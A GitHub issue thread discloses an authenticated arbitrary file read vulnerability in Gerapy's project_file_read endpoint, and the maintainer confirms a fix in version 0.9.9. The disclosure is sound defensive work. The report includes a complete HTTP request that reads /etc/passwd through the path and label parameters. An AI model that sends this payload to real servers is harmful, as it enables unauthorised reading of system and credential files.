### ISSUE TITLE
Arbitrary file reading vulnerability after authentication - Vuln

### ISSUE THREAD

**Issue by PeiQi0** [Gerapy/Gerapy#218]
Hello, I am a security researcher. I found an arbitrary file reading vulnerability in your team's project. After obtaining background permission, an attacker can send a specific request package to obtain sensitive files and other information in the server. Such an error will threaten the user's security

Location of vulnerable code：gerapy/server/core/views.py   project_file_read方法
![image](https://user-images.githubusercontent.com/63465298/143733992-aa46c253-33bd-4c02-ab8c-4eb076d1496c.png)

The parameters path and label are user controllable variables, and the request package is constructed after login

POST /api/project/file/read HTTP/1.1
Host: 
Content-Length: 35
Accept: application/json, text/plain, */*
Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

{"path":"/etc/","label":"passwd"}

![image](https://user-images.githubusercontent.com/63465298/143734038-6a8d9a93-fc69-463d-be49-a401dce591e9.png)

**Comment by ltfafei** [comment]
有位师傅在你之前交了https://github.com/Gerapy/Gerapy/issues/210

**Comment by Germey** [comment]
Fixed in 0.9.9 and published advisories: https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j
